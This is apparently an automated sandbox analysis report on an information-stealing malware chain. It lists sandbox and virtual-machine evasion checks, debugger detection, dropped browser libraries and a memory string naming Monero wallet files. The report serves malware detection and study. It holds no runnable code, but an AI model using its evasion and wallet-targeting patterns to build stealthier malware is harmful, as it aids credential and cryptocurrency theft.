Source: Yara match	File source: 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5164, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

graph_5-50007

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_5-50008

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 4710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 4610000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory allocated: 2D50000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Memory allocated: 2C50000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory allocated: 12A0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Memory allocated: 12C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 24A0000 memory reserve \| memory write watch
Source: C:\Users\userEHJDHJKFIE.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\userEHJDHJKFIE.exe	Memory allocated: 2570000 memory reserve \| memory write watch
Source: C:\Users\userEHJDHJKFIE.exe	Memory allocated: 4570000 memory reserve \| memory write watch
Source: C:\Users\userBAKKEGCAAE.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Users\userBAKKEGCAAE.exe	Memory allocated: 3290000 memory reserve \| memory write watch
Source: C:\Users\userBAKKEGCAAE.exe	Memory allocated: 14D0000 memory reserve \| memory write watch
Source: C:\ProgramData\GHDHDBAECG.exe	Memory allocated: AF0000 memory reserve \| memory write watch
Source: C:\ProgramData\GHDHDBAECG.exe	Memory allocated: 25A0000 memory reserve \| memory write watch
Source: C:\ProgramData\GHDHDBAECG.exe	Memory allocated: 45A0000 memory reserve \| memory write watch
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory allocated: B30000 memory reserve \| memory write watch
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\ProgramData\CBFIIEHJDB.exe	Memory allocated: 2430000 memory reserve \| memory write watch
Source: C:\ProgramData\KEHDBAEGII.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\ProgramData\KEHDBAEGII.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\ProgramData\KEHDBAEGII.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch
Source: C:\Users\userDHDAFBFCFH.exe	Memory allocated: D00000 memory reserve \| memory write watch
Source: C:\Users\userDHDAFBFCFH.exe	Memory allocated: 28C0000 memory reserve \| memory write watch
Source: C:\Users\userDHDAFBFCFH.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\userCAAKKFHCFI.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\userCAAKKFHCFI.exe	Memory allocated: 29D0000 memory reserve \| memory write watch
Source: C:\Users\userCAAKKFHCFI.exe	Memory allocated: 27F0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep,

5_2_00432300

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userEHJDHJKFIE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBAKKEGCAAE.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\GHDHDBAECG.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\CBFIIEHJDB.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KEHDBAEGII.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userDHDAFBFCFH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userCAAKKFHCFI.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Window / User API: threadDelayed 5679	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Window / User API: threadDelayed 4003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Window / User API: threadDelayed 4433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Window / User API: threadDelayed 5184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Window / User API: threadDelayed 398
Source: C:\Users\userEHJDHJKFIE.exe	Window / User API: threadDelayed 484
Source: C:\Users\userBAKKEGCAAE.exe	Window / User API: threadDelayed 498
Source: C:\ProgramData\GHDHDBAECG.exe	Window / User API: threadDelayed 382
Source: C:\ProgramData\CBFIIEHJDB.exe	Window / User API: threadDelayed 496
Source: C:\ProgramData\KEHDBAEGII.exe	Window / User API: threadDelayed 494
Source: C:\Users\userDHDAFBFCFH.exe	Window / User API: threadDelayed 472

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.0 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry key enumerated: More than 127 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\file.exe TID: 7472	Thread sleep count: 363 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7464	Thread sleep count: 112 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 7592	Thread sleep count: 5679 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 7596	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 7584	Thread sleep count: 4003 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 7620	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 7620	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 7680	Thread sleep count: 4433 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 7680	Thread sleep count: 5184 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 7620	Thread sleep count: 220 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe TID: 7800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7860	Thread sleep count: 50 > 30
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe TID: 3808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe TID: 1072	Thread sleep count: 192 > 30
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe TID: 1072	Thread sleep count: 300 > 30
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe TID: 2128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userEHJDHJKFIE.exe TID: 1028	Thread sleep count: 484 > 30
Source: C:\Users\userEHJDHJKFIE.exe TID: 4632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userBAKKEGCAAE.exe TID: 6020	Thread sleep count: 498 > 30
Source: C:\Users\userBAKKEGCAAE.exe TID: 1216	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2424	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\GHDHDBAECG.exe TID: 3468	Thread sleep count: 382 > 30
Source: C:\ProgramData\GHDHDBAECG.exe TID: 7768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4520	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\CBFIIEHJDB.exe TID: 6600	Thread sleep count: 496 > 30
Source: C:\ProgramData\CBFIIEHJDB.exe TID: 6536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\KEHDBAEGII.exe TID: 7152	Thread sleep count: 494 > 30
Source: C:\ProgramData\KEHDBAEGII.exe TID: 7040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7488	Thread sleep count: 74 > 30
Source: C:\Users\userDHDAFBFCFH.exe TID: 5676	Thread sleep count: 472 > 30
Source: C:\Users\userDHDAFBFCFH.exe TID: 4996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userCAAKKFHCFI.exe TID: 7960	Thread sleep count: 215 > 30
Source: C:\Users\userCAAKKFHCFI.exe TID: 4108	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0053FAB6 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	5_2_0053FAB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	15_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	15_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	15_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	15_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	15_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	15_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	15_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040DE10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00401160 GetSystemInfo,ExitProcess,

15_2_00401160

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userEHJDHJKFIE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBAKKEGCAAE.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\GHDHDBAECG.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\CBFIIEHJDB.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KEHDBAEGII.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userDHDAFBFCFH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userCAAKKFHCFI.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: RegAsm.exe, 00000020.00000002.2115365446.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware>
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8g
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000139D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2705735289.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2705735289.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000145C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2115365446.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2562334004.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.000000000119F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000118C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2560297063.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware a
Source: RegAsm.exe, 0000001E.00000002.2538825385.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPVF
Source: RegAsm.exe, 0000003C.00000002.2930077013.000000000118C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]
Source: LKMService.exe, 00000001.00000002.4178036277.00000000060B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp^:
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware+
Source: RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareK

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00552E40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00552E40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

15_2_004045C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

15_2_00419860

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00432300 mov eax, dword ptr fs:[00000030h]	5_2_00432300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00432300 mov eax, dword ptr fs:[00000030h]	5_2_00432300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00419750 mov eax, dword ptr fs:[00000030h]	15_2_00419750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0050BE90 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,

5_2_0050BE90

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0053EBD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0053EBD5
